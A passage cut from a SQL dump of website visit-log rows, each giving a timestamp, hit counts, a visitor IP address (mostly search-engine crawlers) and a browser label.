e'),(405835,1553703277,1,1,0,0,'95.108.213.4','other'),(405836,1553703480,1,1,0,0,'46.229.168.148','other'),(405837,1553703629,1,1,0,0,'178.154.244.11','other'),(405838,1553703786,3,3,0,0,'5.45.207.79','other'),(405839,1553705352,2,2,0,0,'207.46.13.195','other'),(405840,1553705534,1,1,0,0,'66.249.66.138','chrome'),(405841,1553705625,1,1,0,0,'46.229.168.142','other'),(405842,1553705633,1,1,0,0,'66.249.66.134','chrome'),(405843,1553706257,2,2,0,0,'66.249.66.136','chrome'),(405844,1553706396,1,1,0,0,'40.77.167.66','other'),(405845,1553706821,3,3,0,0,'66.249.66.134','chrome'),(405846,1553706823,1,1,0,0,'207.46.13.29','other'),(405847,1553707198,1,1,0,0,'66.249.66.136','chrome'),(405848,1553707476,2,2,0,0,'66.249.66.138','chrome'),(405849,1553707871,2,2,0,0,'66.249.66.134','chrome'),(405850,1553707895,1,1,0,0,'66.249.66.66','chrome'),(405851,1553708916,1,1,0,0,'207.46.13.210','other'),(405852,1553709896,1,1,0,0,'66.249.66.134','chrome'),(405853,1553709986,1,1,0,0,'207.46.13.29','other'),(405854,1553710322,1,1,0,0,'46.229.168.148','other'),(405855,1553710575,1,1,0,0,'66.249.66.68','chrome'),(405856,1553710655,1,1,0,0,'46.229.168.130','other'),(405857,1553710985,1,1,0,0,'95.163.255.47','other'),(405858,1553711187,1,1,0,0,'46.229.168.137','other'),(405859,1553711261,1,1,0,0,'46.229.168.154','other'),(405860,1553711810,2,2,0,0,'66.249.66.136','chrome'),(405861,1553711856,1,1,0,0,'66.249.66.138','chrome'),(405862,1553712060,1,1,0,0,'66.249.66.66','chrome'),(405863,1553712065,1,1,0,0,'37.9.113.103','other'),(405864,1553712171,2,2,0,0,'5.45.207.79','other'),(405865,1553712238,1,1,0,0,'87.250.224.81','other'),(405866,1553712629,2,2,0,0,'8.29.198.25','other'),(405867,1553712993,1,1,0,0,'5.45.207.19','other'),(405868,1553713000,2,2,0,0,'178.154.244.11','other'),(405869,1553713083,1,1,0,0,'66.249.66.136','chrome'),(405870,1553713283,1,1,0,0,'66.249.66.64','chrome'),(405871,1553713565,2,2,0,0,'157.55.39.244','other'),(405872,1553713803,1,1,0,0,'40.77.167.71','other'),(405873,1553713850,1,1,0,0,'91.124.181.19','chrome'),(405874,1553714050,1,1,0,0,'46.229.168.146','other'),(405875,1553714178,1,1,0,0,'46.229.168.142','other'),(405876,1553714858,1,1,0,0,'66.249.66.64','chrome'),(405877,1553715312,1,1,0,0,'180.76.15.143','other'),(405878,1553715319,1,1,0,0,'109.201.152.247','other'),(405879,1553715401,1,1,0,0,'46.229.168.137','other'),(405880,1553715793,1,1,0,0,'91.209.11.236','other'),(405881,1553715843,1,1,0,0,'66.249.66.68','chrome'),(405882,1553715959,1,1,0,0,'66.249.66.136','chrome'),(405883,1553716061,1,1,0,0,'40.77.167.71','other'),(405884,1553716814,2,2,0,0,'66.249.66.134','chrome'),(405885,1553717161,3,3,0,0,'66.249.66.136','chrome'),(405886,1553717293,1,1,0,0,'40.77.167.71','other'),(405887,1553717626,1,1,0,0,'46.229.168.147','other'),(405888,1553717914,1,1,0,0,'66.249.66.134','chrome'),(405889,1553719020,1,1,0,0,'46.229.168.141','other'),(405890,1553719781,1,1,0,0,'157.55.39.244','other'),(405891,1553720304,1,1,0,0,'5.45.207.79','other'),(405892,1553720490,1,1,0,0,'46.229.168.146','other'),(405893,1553720843,3,3,0,0,'66.249.66.138','chrome'),(405894,1553720878,2,2,0,0,'66.249.66.134','chrome'),(405895,1553720964,1,1,0,0,'46.229.168.144','other'),(405896,1553721205,1,1,0,0,'66.249.66.136','chrome'),(405897,1553722170,2,2,0,0,'66.249.66.136','chrome'),(405898,1553722256,1,1,0,0,'46.229.168.154','other'),(405899,1553722270,1,1,0,0,'46.119.112.31','chrome'),(405900,1553722400,1,1,0,0,'46.229.168.135','other'),(405901,1553722423,1,1,0,0,'91.209.11.236','other'),(405902,1553722483,2,2,0,0,'5.45.207.79','other'),(405903,1553722542,1,1,0,0,'141.8.142.103','other'),(405904,1553722814,1,1,0,0,'66.249.66.138','chrome'),(405905,1553723120,3,3,0,0,'66.249.66.134','chrome'),(405906,1553723179,1,1,0,0,'178.255.215.94','other'),(405907,1553723426,1,1,0,0,'5.45.207.79','other'),(405908,1553723500,1,1,0,0,'8.29.198.25','other'),(405909,1553723504,1,1,0,0,'8.29.198.26','other'),(405910,1553723578,2,2,0,0,'66.249.66.136','chrome'),(405911,1553723913,1,1,0,0,'46.229.168.147','other'),(405912,1553725898,1,1,0,0,'66.249.66.68','chrome'),(405913,1553726153,1,1,0,0,'46.229.168.134','other'),(405914,1553726211,1,1,0,0,'157.55.39.236','other'),(405915,1553727674,1,1,0,0,'46.229.168.150','other'),(405916,1553728263,1,1,0,0,'46.229.168.154','other'),(405917,1553728372,1,1,0,0,'66.249.66.138','chrome'),(405918,1553728396,4,4,0,0,'66.249.66.134','chrome'),(405919,1553729184,1,1,0,0,'46.229.168.163','other'),(405920,1553729246,1,1,0,0,'66.249.66.136','chrome'),(405921,1553729292,1,1,0,0,'66.249.66.138','chrome'),(405922,1553729422,1,1,0,0,'91.225.165.252','other'),(405923,1553729977,14,14,0,0,'207.46.13.195','other'),(405924,1553729996,11,11,0,0,'40.77.167.14','other'),(405925,1553730011,18,18,0,0,'157.55.39.244','other'),(405926,1553730289,1,1,0,0,'66.249.66.138','chrome'),(405927,1553731351,1,1,0,0,'46.229.168.146','other'),(405928,1553731671,1,1,0,0,'66.249.66.138','chrome'),(405929,1553731967,1,1,0,0,'40.77.167.14','other'),(405930,1553731977,1,1,0,0,'207.46.13.195','other'),(405931,1553732426,1,1,0,0,'46.229.168.143','other'),(405932,1553732526,1,1,0,0,'46.229.168.129','other'),(405933,1553732532,1,1,0,0,'5.45.207.79','other'),(405934,1553732932,1,1,0,0,'95.108.213.4','other'),(405935,1553733001,1,1,0,0,'66.249.66.136','chrome'),(405936,1553733036,2,2,0,0,'178.154.244.11','other'),(405937,1553733270,1,1,0,0,'46.229.168.153','other'),(405938,1553733363,1,1,0,0,'66.249.66.138','chrome'),(405939,1553733995,1,1,0,0,'141.8.142.103','other'),(405940,1553734002,1,1,0,0,'5.45.207.79','other'),(405941,1553734358,1,1,0,0,'8.29.198.27','other'),(405942,1553734359,1,1,0,0,'8.29.198.25','other'),(405943,1553734363,1,1,0,0,'66.249.66.138','chrome'),(405944,1553734498,1,1,0,0,'34.220.213.16','other'),(405945,1553735531,1,1,0,0,'46.229.168.136','other'),(405946,1553735645,3,3,0,0,'66.249.66.134','chrome'),(405947,1553735929,1,1,0,0,'46.229.168.140','other'),(405948,1553736149,1,1,0,0,'157.55.39.181','other'),(405949,1553736179,1,1,0,0,'40.77.167.14','other'),(405950,1553736274,1,1,0,0,'52.53.201.78','chrome'),(405951,1553736433,1,1,0,0,'38.145.77.171','chrome'),(405952,1553736489,1,1,0,0,'66.249.66.66','chrome'),(405953,1553736754,1,1,0,0,'66.249.66.136','chrome'),(405954,1553736780,1,1,0,0,'46.229.168.144','other'),(405955,1553737059,1,1,0,0,'40.77.167.176','other'),(405956,1553737178,1,1,0,0,'66.249.66.68','chrome'),(405957,1553737183,1,1,0,0,'46.229.168.151','other'),(405958,1553737337,2,2,0,0,'35.162.175.64','chrome'),(405959,1553737557,2,2,0,0,'66.249.64.31','chrome'),(405960,1553737767,1,1,0,0,'66.249.66.66','chrome'),(405961,1553738049,1,1,0,0,'66.249.64.58','chrome'),(405962,1553738296,1,1,0,0,'46.229.168.146','other'),(405963,1553738624,1,1,0,0,'40.77.167.75','other'),(405964,1553738753,1,1,0,0,'66.249.64.62','chrome'),(405965,1553738883,3,3,0,0,'66.249.64.31','chrome'),(405966,1553739063,2,2,0,0,'66.249.64.30','chrome'),(405967,1553739963,1,1,0,0,'66.249.64.29','chrome'),(405968,1553740004,1,1,0,0,'66.249.64.60','chrome'),(405969,1553740150,1,1,0,0,'66.249.64.58','chrome'),(405970,1553740366,1,1,0,0,'46.229.168.147','other'),(405971,1553740470,1,1,0,0,'46.229.168.142','other'),(405972,1553740508,1,1,0,0,'46.229.168.145','other'),(405973,1553740666,2,2,0,0,'66.249.64.62','chrome'),(405974,1553740980,1,1,0,0,'109.74.154.72','chrome'),(405975,1553741299,3,3,0,0,'66.249.64.29','chrome'),(405976,1553741960,1,1,0,0,'66.249.64.30','chrome'),(405977,1553742118,1,1,0,0,'66.249.64.31','chrome'),(405978,1553742139,4,4,0,0,'5.45.207.79','other'),(405979,1553742189,1,1,0,0,'5.45.207.19','other'),(405980,1553742309,1,1,0,0,'46.229.168.135','other'),(405981,1553742351,1,1,0,0,'40.77.167.75','other'),(405982,1553742625,2,2,0,0,'141.8.142.103','other'),(405983,1553742717,1,1,0,0,'46.229.168.143','other'),(405984,1553742757,4,4,0,0,'178.154.244.11','other'),(405985,1553743820,1,1,0,0,'207.46.13.103','other'),(405986,1553743842,1,1,0,0,'66.249.64.31','chrome'),(405987,1553743882,1,1,0,0,'178.154.244.11','other'),(405988,1553744356,1,1,0,0,'46.229.168.147','other'),(405989,1553744841,1,1,0,0,'141.8.142.103','other'),(405990,1553744985,2,2,0,0,'66.249.64.30','chrome'),(405991,1553745209,1,1,0,0,'8.29.198.25','other'),(405992,1553745213,1,1,0,0,'8.29.198.26','other'),(405993,1553745414,1,1,0,0,'66.249.64.31','chrome'),(405994,1553745906,1,1,0,0,'66.249.64.58','chrome'),(405995,1553746152,1,1,0,0,'46.211.50.186','chrome'),(405996,1553746233,2,2,0,0,'207.46.13.53','other'),(405997,1553746285,1,1,0,0,'66.249.64.29','chrome'),(405998,1553746733,1,1,0,0,'66.249.64.31','chrome'),(405999,1553747005,1,1,0,0,'193.106.30.98','firefox'),(406000,1553748042,1,1,0,0,'46.229.168.129','other'),(406001,1553748714,3,3,0,0,'66.249.64.58','chrome'),(406002,1553748797,2,2,0,0,'66.249.64.30','chrome'),(406003,1553748882,2,2,0,0,'66.249.64.29','chrome'),(406004,1553749039,1,1,0,0,'66.249.64.60','chrome'),(406005,1553749982,4,4,0,0,'66.249.64.29','chrome'),(406006,1553750198,2,2,0,0,'66.249.64.31','chrome'),(406007,1553750891,1,1,0,0,'66.249.64.29','chrome'),(406008,1553750931,1,1,0,0,'46.229.168.163','other'),(406009,1553750933,5,5,0,0,'66.249.64.30','chrome'),(406010,1553751168,2,2,0,0,'66.249.64.58','chrome'),(406011,1553751203,1,1,0,0,'46.229.168.144','other'),(406012,1553751214,1,1,0,0,'46.229.168.150','other'),(406013,1553751295,1,1,0,0,'178.154.244.65','other'),(406014,1553751338,2,2,0,0,'157.55.39.86','other'),(406015,1553751357,1,1,0,0,'178.154.244.11','other'),(406016,1553751489,1,1,0,0,'46.229.168.146','other'),(406017,1553751883,1,1,0,0,'95.108.213.4','other'),(406018,1553752194,1,1,0,0,'5.45.207.79','other'),(406019,1553752367,1,1,0,0,'40.77.167.75','other'),(406020,1553752687,1,1,0,0,'46.229.168.147','other'),(406021,1553752949,1,1,0,0,'188.163.26.63','chrome'),(406022,1553753024,2,2,0,0,'66.249.64.30','chrome'),(406023,1553753082,1,1,0,0,'66.249.64.31','chrome'),(406024,1553754566,1,1,0,0,'51.159.1.114','other'),(406025,1553754641,2,2,0,0,'66.249.64.30','chrome'),(406026,1553755060,1,1,0,0,'46.229.168.129','other'),(406027,1553755374,1,1,0,0,'157.55.39.97','other'),(406028,1553755810,1,1,0,0,'91.196.178.180','firefox'),(406029,1553756064,2,2,0,0,'8.29.198.25','other'),(406030,1553756289,1,1,0,0,'66.249.64.60','chrome'),(406031,1553756362,1,1,0,0,'66.249.64.31','chrome'),(406032,1553756404,1,1,0,0,'46.229.168.133','other'),(406033,1553756612,1,1,0,0,'46.229.168.144','other'),(406034,1553756950,1,1,0,0,'40.77.167.33','other'),(406035,1553757480,1,1,0,0,'46.229.168.137','other'),(406036,1553757584,1,1,0,0,'180.76.15.161','other'),(406037,1553757675,1,1,0,0,'80.91.171.35','chrome'),(406038,1553757848,1,1,0,0,'66.249.64.62','chrome'),(406039,1553757917,1,1,0,0,'66.249.64.30','chrome'),(406040,1553758169,1,1,0,0,'46.229.168.136','other'),(406041,1553758231,1,1,0,0,'91.196.178.93','chrome'),(406042,1553758787,1,1,0,0,'5.45.207.19','other'),(406043,1553758789,1,1,0,0,'141.8.142.103','other'),(406044,1553758930,1,1,0,0,'66.249.64.30','chrome'),(406045,1553759057,1,1,0,0,'157.55.39.164','other'),(406046,1553759508,1,1,0,0,'46.229.168.144','other'),(406047,1553759901,1,1,0,0,'46.229.168.140','other'),(406048,1553760104,1,1,0,0,'13.66.139.0','other'),(406049,1553760254,1,1,0,0,'66.249.64.31','chrome'),(406050,1553760300,1,1,0,0,'66.249.64.30','chrome'),(406051,1553760692,1,1,0,0,'5.188.210.44','chrome'),(406052,1553760765,1,1,0,0,'42.236.10.84','chrome'),(406053,1553761486,3,3,0,0,'66.249.64.30','chrome'),(406054,1553761548,1,1,0,0,'66.249.64.29','chrome'),(406055,1553761798,1,1,0,0,'66.249.64.62','chrome'),(406056,1553761888,1,1,0,0,'157.55.39.76','other'),(406057,1553762111,1,1,0,0,'91.196.178.74','chrome'),(406058,1553762225,1,1,0,0,'91.196.178.65','chrome'),(406059,1553762389,1,1,0,0,'157.55.39.71','other'),(406060,1553762438,1,1,0,0,'46.133.237.39','chrome'),(406061,1553762488,1,1,0,0,'46.229.168.144','other'),(406062,1553762587,1,1,0,0,'66.249.64.30','chrome'),(406063,1553762845,1,1,0,0,'94.153.134.218','firefox'),(406064,1553762938,1,1,0,0,'66.249.64.62','chrome'),(406065,1553762970,4,4,0,0,'178.154.244.11','other'),(406066,1553762991,2,2,0,0,'5.45.207.79','other'),(406067,1553763988,1,0,1,0,'66.249.64.29',''),(406068,1553764051,1,0,1,0,'66.249.64.58',''),(406069,1553764123,1,1,0,0,'188.163.5.45','chrome'),(406070,1553764651,2,2,0,0,'66.249.64.29','chrome'),(406071,1553764716,1,1,0,0,'87.250.224.47','other'),(406072,1553764740,2,2,0,0,'46.229.168.148','other'),(406073,1553764768,1,1,0,0,'178.154.244.11','other'),(406074,1553764812,1,1,0,0,'91.196.178.84','firefox'),(406075,1553764865,1,1,0,0,'95.108.213.4','other'),(406076,1553764899,2,2,0,0,'5.45.207.79','other'),(406077,1553765250,1,1,0,0,'94.100.221.234','chrome'),(406078,1553765410,1,1,0,0,'66.249.64.58','chrome'),(406079,1553765514,2,2,0,0,'66.249.64.30','chrome'),(406080,1553765864,1,1,0,0,'66.249.64.31','chrome'),(406081,1553766024,1,1,0,0,'40.77.167.222','other'),(406082,1553766185,1,1,0,0,'157.55.39.107','other'),(406083,1553766908,1,1,0,0,'8.29.198.26','other'),(406084,1553766927,1,1,0,0,'8.29.198.27','other'),(406085,1553767468,1,1,0,0,'66.249.64.30','chrome'),(406086,1553767785,1,1,0,0,'40.77.167.90','other'),(406087,1553767948,1,0,1,0,'66.249.64.31',''),(406088,1553768317,1,1,0,0,'89.252.21.52','other'),(406089,1553768634,1,1,0,0,'66.249.64.29','chrome'),(406090,1553768686,1,1,0,0,'46.229.168.151','other'),(406091,1553769675,3,3,0,0,'5.45.207.79','other'),(406092,1553770090,1,1,0,0,'207.46.13.242','other'),(406093,1553770221,1,1,0,0,'77.232.153.155','chrome'),(406094,1553770639,1,1,0,0,'46.229.168.144','other'),(406095,1553770775,1,1,0,0,'66.249.64.30','chrome'),(406096,1553770781,1,1,0,0,'46.229.168.152','other'),(406097,1553771105,1,1,0,0,'66.249.64.29','chrome'),(406098,1553771141,1,1,0,0,'207.46.13.118','other'),(406099,1553771406,1,1,0,0,'95.108.213.4','other'),(406100,1553771620,2,2,0,0,'141.8.142.103','other'),(406101,1553771622,1,1,0,0,'37.9.113.103','other'),(406102,1553771719,1,1,0,0,'88.135.193.231','chrome'),(406103,1553772435,1,1,0,0,'180.76.15.13','other'),(406104,1553772506,18,18,0,0,'69.30.205.218','other'),(406105,1553772710,1,1,0,0,'46.229.168.163','other'),(406106,1553772768,1,1,0,0,'157.55.39.70','other'),(406107,1553773636,1,1,0,0,'46.229.168.152','other'),(406108,1553773885,1,1,0,0,'66.249.64.31','chrome'),(406109,1553774072,2,2,0,0,'178.154.244.11','other'),(406110,1553774077,1,1,0,0,'5.45.207.79','other'),(406111,1553774207,1,1,0,0,'207.46.13.118','other'),(406112,1553774301,1,1,0,0,'213.180.203.9','other'),(406113,1553774323,1,1,0,0,'207.46.13.183','other'),(406114,1553774327,1,1,0,0,'207.46.13.242','other'),(406115,1553774371,1,1,0,0,'157.55.39.76','other'),(406116,1553774435,1,1,0,0,'180.76.15.160','other'),(406117,1553774582,1,1,0,0,'46.229.168.132','other'),(406118,1553774715,1,1,0,0,'37.9.113.148','other'),(406119,1553774720,1,1,0,0,'66.249.64.29','chrome'),(406120,1553775614,1,1,0,0,'141.8.142.103','other'),(406121,1553775643,1,1,0,0,'91.196.178.65','chrome'),(406122,1553775878,1,1,0,0,'91.209.11.236','other'),(406123,1553776133,1,1,0,0,'66.249.64.31','chrome'),(406124,1553776389,1,1,0,0,'46.229.168.151','other'),(406125,1553776391,1,1,0,0,'207.46.13.242','other'),(406126,1553776623,1,1,0,0,'91.196.177.46','firefox'),(406127,1553776854,1,1,0,0,'66.249.64.30','chrome'),(406128,1553777092,1,1,0,0,'157.55.39.191','other'),(406129,1553777262,1,1,0,0,'66.249.64.58','chrome'),(406130,1553777340,1,1,0,0,'40.77.167.163','other'),(406131,1553777777,1,1,0,0,'8.29.198.27','other'),(406132,1553777795,1,1,0,0,'8.29.198.25','other'),(406133,1553778018,1,1,0,0,'66.249.64.62','chrome'),(406134,1553778158,1,1,0,0,'46.229.168.130','other'),(406135,1553778393,2,2,0,0,'66.249.64.30','chrome'),(406136,1553778773,1,1,0,0,'66.249.64.29','chrome'),(406137,1553779002,1,1,0,0,'207.46.13.175','other'),(406138,1553779480,2,2,0,0,'91.196.178.84','firefox'),(406139,1553780133,1,1,0,0,'66.249.64.29','chrome'),(406140,1553781261,1,1,0,0,'5.196.87.171','other'),(406141,1553781441,1,1,0,0,'207.46.13.175','other'),(406142,1553781513,1,1,0,0,'207.46.13.242','other'),(406143,1553781576,1,1,0,0,'157.55.39.250','other'),(406144,1553781853,3,3,0,0,'178.154.244.11','other'),(406145,1553782070,1,1,0,0,'37.9.113.103','other'),(406146,1553782485,1,1,0,0,'46.229.168.132','other'),(406147,1553782508,1,1,0,0,'66.249.64.60','chrome'),(406148,1553783516,1,1,0,0,'178.154.200.8','other'),(406149,1553784015,1,1,0,0,'46.229.168.162','other'),(406150,1553784503,2,2,0,0,'66.70.178.216','chrome'),(406151,1553784846,1,1,0,0,'91.196.178.185','chrome'),(406152,1553784943,1,1,0,0,'5.196.87.174','other'),(406153,1553785103,1,1,0,0,'46.229.168.137','other'),(406154,1553786019,1,1,0,0,'207.46.13.61','other'),(406155,1553786743,1,1,0,0,'212.90.45.139','firefox'),(406156,1553787193,1,1,0,0,'46.229.168.148','other'),(406157,1553787226,1,1,0,0,'207.46.13.242','other'),(406158,1553787537,1,1,0,0,'66.249.64.30','chrome'),(406159,1553788286,1,1,0,0,'66.102.9.60','chrome'),(406160,1553788634,2,2,0,0,'8.29.198.25','other'),(406161,1553788811,1,1,0,0,'157.55.39.107','other'),(406162,1553789310,1,1,0,0,'66.249.64.30','chrome'),(406163,1553789635,2,2,0,0,'66.249.64.29','chrome'),(406164,1553789673,1,1,0,0,'66.249.64.31','chrome'),(406165,1553790228,1,1,0,0,'207.46.13.61','other'),(406166,1553790238,4,4,0,0,'5.45.207.19','other'),(406167,1553790252,1,1,0,0,'5.45.207.79','other'),(406168,1553790615,1,1,0,0,'141.8.142.108','other'),(406169,1553791160,1,1,0,0,'5.45.207.19','other'),(406170,1553791449,2,2,0,0,'178.154.244.11','other'),(406171,1553791637,1,1,0,0,'46.229.168.145','other'),(406172,1553791841,1,1,0,0,'89.252.21.52','other'),(406173,1553793108,1,1,0,0,'46.229.168.142','other'),(406174,1553793164,1,1,0,0,'46.229.168.141','other'),(406175,1553793319,1,1,0,0,'5.196.87.172','other'),(406176,1553794872,1,1,0,0,'66.249.64.62','chrome'),(406177,1553795065,1,1,0,0,'66.249.64.31','chrome'),(406178,1553796165,1,1,0,0,'46.229.168.144','other'),(406179,1553796168,1,1,0,0,'40.77.167.109','other'),(406180,1553796710,1,1,0,0,'93.171.243.129','chrome'),(406181,1553797210,2,2,0,0,'40.77.167.109','other'),(406182,1553797506,1,1,0,0,'91.196.178.73','firefox'),(406183,1553797714,1,1,0,0,'216.244.66.241','other'),(406184,1553798328,2,2,0,0,'207.46.13.61','other'),(406185,1553798475,2,2,0,0,'66.249.64.31','chrome'),(406186,1553799215,2,2,0,0,'40.77.167.85','other'),(406187,1553799430,1,1,0,0,'66.249.64.62','chrome'),(406188,1553799450,1,1,0,0,'178.154.244.11','other'),(406189,1553799503,1,1,0,0,'8.29.198.25','other'),(406190,1553799516,1,1,0,0,'8.29.198.26','other'),(406191,1553800093,2,2,0,0,'5.45.207.79','other'),(406192,1553800549,1,1,0,0,'66.249.64.58','chrome'),(406193,1553800721,1,1,0,0,'207.46.13.153','other'),(406194,1553800973,1,1,0,0,'46.229.168.139','other'),(406195,1553800978,1,1,0,0,'46.229.168.130','other'),(406196,1553801507,1,1,0,0,'46.229.168.141','other'),(406197,1553801830,1,1,0,0,'207.46.13.30','other'),(406198,1553801909,1,1,0,0,'66.249.64.31','chrome'),(406199,1553801974,1,1,0,0,'66.249.64.62','chrome'),(406200,1553803411,1,1,0,0,'66.249.64.30','chrome'),(406201,1553803781,1,1,0,0,'46.229.168.146','other'),(406202,1553803926,1,1,0,0,'46.229.168.133','other'),(406203,1553804611,2,2,0,0,'207.46.13.30','other'),(406204,1553804891,1,1,0,0,'46.229.168.161','other'),(406205,1553805550,1,1,0,0,'54.36.148.20','other'),(406206,1553805646,1,1,0,0,'40.77.167.85','other'),(406207,1553805751,1,1,0,0,'54.36.148.12','other'),(406208,1553806260,1,1,0,0,'54.36.150.88','other'),(406209,1553806292,1,1,0,0,'54.36.148.39','other'),(406210,1553806629,1,1,0,0,'46.229.168.143','other'),(406211,1553806822,1,1,0,0,'54.36.150.73','other'),(406212,1553806851,1,1,0,0,'176.14.242.104','msie'),(406213,1553806962,1,1,0,0,'54.36.148.109','other'),(406214,1553806969,2,2,0,0,'157.55.39.78','other'),(406215,1553807032,1,1,0,0,'46.229.168.153','other'),(406216,1553807315,1,1,0,0,'54.36.149.79','other'),(406217,1553807349,1,1,0,0,'5.45.207.79','other'),(406218,1553807416,1,1,0,0,'40.77.167.85','other'),(406219,1553807436,1,1,0,0,'54.36.148.110','other'),(406220,1553807441,1,1,0,0,'54.36.148.211','other'),(406221,1553807723,1,1,0,0,'157.55.39.61','other'),(406222,1553807754,1,1,0,0,'209.17.97.90','other'),(406223,1553808090,1,1,0,0,'46.229.168.144','other'),(406224,1553808259,1,1,0,0,'91.209.11.236','other'),(406225,1553808294,1,1,0,0,'54.36.150.96','other'),(406226,1553808377,1,1,0,0,'54.36.148.231','other'),(406227,1553808557,2,2,0,0,'5.45.207.79','other'),(406228,1553808857,1,1,0,0,'37.9.113.148','other'),(406229,1553809021,1,1,0,0,'54.36.149.33','other'),(406230,1553809066,1,1,0,0,'46.229.168.137','other'),(406231,1553809093,2,2,0,0,'141.8.142.103','other'),(406232,1553809135,1,1,0,0,'178.154.244.11','other'),(406233,1553809564,1,1,0,0,'54.36.150.115','other'),(406234,1553809757,1,1,0,0,'54.36.150.100','other'),(406235,1553809863,1,1,0,0,'5.45.207.19','other'),(406236,1553810090,1,1,0,0,'54.36.148.217','other'),(406237,1553810100,1,1,0,0,'66.249.64.29','chrome'),(406238,1553810251,1,1,0,0,'5.45.207.79','other'),(406239,1553810341,1,1,0,0,'91.209.11.236','other'),(406240,1553810355,2,2,0,0,'8.29.198.25','other'),(406241,1553810394,1,1,0,0,'157.55.39.61','other'),(406242,1553810541,1,1,0,0,'54.36.148.110','other'),(406243,1553810628,1,1,0,0,'54.36.149.6','other'),(406244,1553811296,1,1,0,0,'54.36.150.118','other'),(406245,1553811664,1,1,0,0,'54.36.150.23','other'),(406246,1553811854,1,1,0,0,'54.36.149.58','other'),(406247,1553811948,1,1,0,0,'54.36.150.4','other'),(406248,1553812148,1,1,0,0,'46.229.168.139','other'),(406249,1553812157,1,1,0,0,'157.55.39.61','other'),(406250,1553812512,1,1,0,0,'54.36.149.92','other'),(406251,1553812612,1,1,0,0,'54.36.149.11','other'),(406252,1553813048,1,1,0,0,'54.36.150.129','other'),(406253,1553813211,1,1,0,0,'66.249.64.31','chrome'),(406254,1553813646,1,1,0,0,'66.249.64.60','chrome'),(406255,1553813794,1,1,0,0,'40.77.167.171','other'),(406256,1553813944,1,1,0,0,'207.46.13.187','other'),(406257,1553814037,1,1,0,0,'54.36.149.47','other'),(406258,1553814095,1,1,0,0,'54.36.150.123','other'),(406259,1553814243,1,1,0,0,'66.249.64.29','chrome'),(406260,1553814350,1,1,0,0,'54.36.148.174','other'),(406261,1553814614,1,1,0,0,'54.36.148.118','other'),(406262,1553814866,1,1,0,0,'46.229.168.132','other'),(406263,1553814985,1,1,0,0,'46.229.168.130','other'),(406264,1553815623,2,2,0,0,'207.46.13.187','other'),(406265,1553816235,1,1,0,0,'46.229.168.150','other'),(406266,1553816255,1,1,0,0,'46.229.168.136','other'),(406267,1553816258,1,1,0,0,'46.229.168.134','other'),(406268,1553816279,2,2,0,0,'66.249.64.31','chrome'),(406269,1553816347,1,1,0,0,'54.36.150.31','other'),(406270,1553816482,1,1,0,0,'40.77.167.171','other'),(406271,1553816507,1,1,0,0,'54.36.149.19','other'),(406272,1553816669,1,1,0,0,'54.36.148.91','other'),(406273,1553816806,1,1,0,0,'54.36.150.25','other'),(406274,1553816874,1,1,0,0,'54.36.150.46','other'),(406275,1553816984,1,1,0,0,'54.36.148.103','other'),(406276,1553817012,1,1,0,0,'54.36.148.142','other'),(406277,1553817395,1,1,0,0,'66.249.64.31','chrome'),(406278,1553817614,1,1,0,0,'54.36.150.106','other'),(406279,1553817744,1,1,0,0,'54.36.148.8','other'),(406280,1553818296,1,1,0,0,'66.249.64.30','chrome'),(406281,1553818360,1,1,0,0,'46.229.168.137','other'),(406282,1553818385,1,1,0,0,'54.36.148.147','other'),(406283,1553818416,83,83,0,0,'5.9.97.200','other'),(406284,1553818422,1,1,0,0,'54.36.148.226','other'),(406285,1553818461,1,1,0,0,'91.209.11.236','other'),(406286,1553818572,1,1,0,0,'54.36.148.204','other'),(406287,1553818696,1,1,0,0,'87.250.224.81','other'),(406288,1553818807,1,1,0,0,'54.36.150.96','other'),(406289,1553818838,1,1,0,0,'54.36.150.56','other'),(406290,1553819111,1,1,0,0,'54.36.149.57','other'),(406291,1553819878,1,1,0,0,'141.8.142.103','other'),(406292,1553819901,1,1,0,0,'209.17.96.226','other'),(406293,1553820022,1,1,0,0,'46.229.168.132','other'),(406294,1553820582,1,1,0,0,'54.36.150.62','other'),(406295,1553820737,1,1,0,0,'54.36.150.76','other'),(406296,1553820984,1,1,0,0,'213.152.162.15','firefox'),(406297,1553821130,1,1,0,0,'54.36.148.238','other'),(406298,1553821194,1,1,0,0,'66.249.64.31','chrome'),(406299,1553821217,1,1,0,0,'8.29.198.25','other'),(406300,1553821245,1,1,0,0,'8.29.198.27','other'),(406301,1553821817,2,2,0,0,'66.249.64.30','chrome'),(406302,1553821899,1,1,0,0,'207.46.13.143','other'),(406303,1553822033,1,1,0,0,'54.36.148.214','other'),(406304,1553822568,1,1,0,0,'54.36.148.22','other'),(406305,1553822595,1,1,0,0,'46.229.168.130','other'),(406306,1553822791,1,1,0,0,'54.36.148.90','other'),(406307,1553822796,1,1,0,0,'46.229.168.161','other'),(406308,1553822998,1,1,0,0,'66.249.64.31','chrome'),(406309,1553823050,1,1,0,0,'54.36.148.111','other'),(406310,1553823339,1,1,0,0,'207.46.13.143','other'),(406311,1553823390,1,1,0,0,'54.36.148.140','other'),(406312,1553823496,1,1,0,0,'40.77.167.21','other'),(406313,1553823617,1,1,0,0,'54.36.148.173','other'),(406314,1553823897,1,1,0,0,'54.36.150.115','other'),(406315,1553824356,1,1,0,0,'54.36.148.191','other'),(406316,1553824412,1,1,0,0,'46.229.168.161','other'),(406317,1553824445,1,1,0,0,'46.229.168.141','other'),(406318,1553824807,1,1,0,0,'46.229.168.163','other'),(406319,1553824974,1,1,0,0,'54.36.150.114','other'),(406320,1553825232,1,1,0,0,'46.229.168.144','other'),(406321,1553825327,1,1,0,0,'66.249.64.30','chrome'),(406322,1553825483,1,1,0,0,'54.36.150.144','other'),(406323,1553825493,1,1,0,0,'207.46.13.143','other'),(406324,1553825754,1,1,0,0,'66.249.64.29','chrome'),(406325,1553825850,1,1,0,0,'54.36.149.34','other'),(406326,1553825983,1,1,0,0,'54.36.150.178','other'),(406327,1553826219,1,1,0,0,'54.36.148.255','other'),(406328,1553826225,1,1,0,0,'54.36.148.38','other'),(406329,1553826241,1,1,0,0,'66.249.64.31','chrome'),(406330,1553826250,1,1,0,0,'54.36.150.88','other'),(406331,1553827163,1,1,0,0,'54.36.150.59','other'),(406332,1553827379,1,1,0,0,'54.36.148.252','other'),(406333,1553827763,1,1,0,0,'54.36.148.67','other'),(406334,1553827920,1,1,0,0,'46.229.168.161','other'),(406335,1553828128,2,2,0,0,'207.46.13.143','other'),(406336,1553828143,1,1,0,0,'109.74.154.72','chrome'),(406337,1553828997,3,3,0,0,'157.55.39.208','other'),(406338,1553829007,1,1,0,0,'40.77.167.140','other'),(406339,1553829455,1,1,0,0,'54.36.149.80','other'),(406340,1553829472,1,1,0,0,'54.36.150.2','other'),(